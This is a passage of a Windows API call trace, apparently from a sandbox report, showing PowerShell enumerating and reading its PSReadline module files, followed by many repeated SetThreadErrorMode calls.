ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.012] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508dc90 | out: lpFindFileData=0xafa508dc90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0152.012] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508dc90 | out: lpFindFileData=0xafa508dc90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0152.012] FindClose (in: hFindFile=0x2386d3b55b0 | out: hFindFile=0x2386d3b55b0) returned 1 [0152.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0152.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0152.013] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.psd1")) returned 0xffffffff [0152.013] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.psm1")) returned 0xffffffff [0152.013] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.cdxml")) returned 0xffffffff [0152.013] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.xaml")) returned 0xffffffff [0152.013] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.dll")) returned 0xffffffff [0152.013] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0xafa508dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0152.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e100) returned 1 [0152.013] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e1e0 | out: lpFileInformation=0xafa508e1e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0152.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e0c0) returned 1 [0152.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e150) returned 1 [0152.013] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0xafa508dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0152.013] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\*"), lpFindFileData=0xafa508de60 | out: lpFindFileData=0xafa508de60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b5790 [0152.014] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.014] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0152.014] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0152.014] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0152.014] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0152.014] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0152.014] FindClose (in: hFindFile=0x2386d3b5790 | out: hFindFile=0x2386d3b5790) returned 1 [0152.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e080) returned 1 [0152.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e040) returned 1 [0152.014] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.psd1")) returned 0xffffffff [0152.014] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.psm1")) returned 0xffffffff [0152.014] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.cdxml")) returned 0xffffffff [0152.014] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.xaml")) returned 0xffffffff [0152.014] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.dll")) returned 0xffffffff [0152.015] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0xafa508de40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0152.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.015] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline"), fInfoLevelId=0x0, lpFileInformation=0xafa508e370 | out: lpFileInformation=0xafa508e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0152.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.015] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0xafa508ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0152.015] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\*"), lpFindFileData=0xafa508dff0 | out: lpFindFileData=0xafa508dff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4710 [0152.015] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.015] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0152.015] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0152.015] FindClose (in: hFindFile=0x2386d3b4710 | out: hFindFile=0x2386d3b4710) returned 1 [0152.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.016] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0xafa508deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0152.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e300) returned 1 [0152.016] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e3e0 | out: lpFileInformation=0xafa508e3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1)) returned 1 [0152.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e2c0) returned 1 [0152.016] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0xafa508dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0152.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0a0) returned 1 [0152.016] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x59c [0152.016] GetFileType (hFile=0x59c) returned 0x1 [0152.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e010) returned 1 [0152.016] GetFileType (hFile=0x59c) returned 0x1 [0152.018] ReadFile (in: hFile=0x59c, lpBuffer=0x2380040efe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x2380040efe8*, lpNumberOfBytesRead=0xafa508e178*=0x2e1, lpOverlapped=0x0) returned 1 [0152.019] ReadFile (in: hFile=0x59c, lpBuffer=0x2380040efe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x2380040efe8*, lpNumberOfBytesRead=0xafa508e178*=0x0, lpOverlapped=0x0) returned 1 [0152.019] CloseHandle (hObject=0x59c) returned 1 [0152.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e420) returned 1 [0152.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e3e0) returned 1 [0152.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e470) returned 1 [0152.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e3a0) returned 1 [0152.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e360) returned 1 [0152.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e410) returned 1 [0152.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e340) returned 1 [0152.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0152.025] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e410) returned 1 [0152.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e340) returned 1 [0152.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0152.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 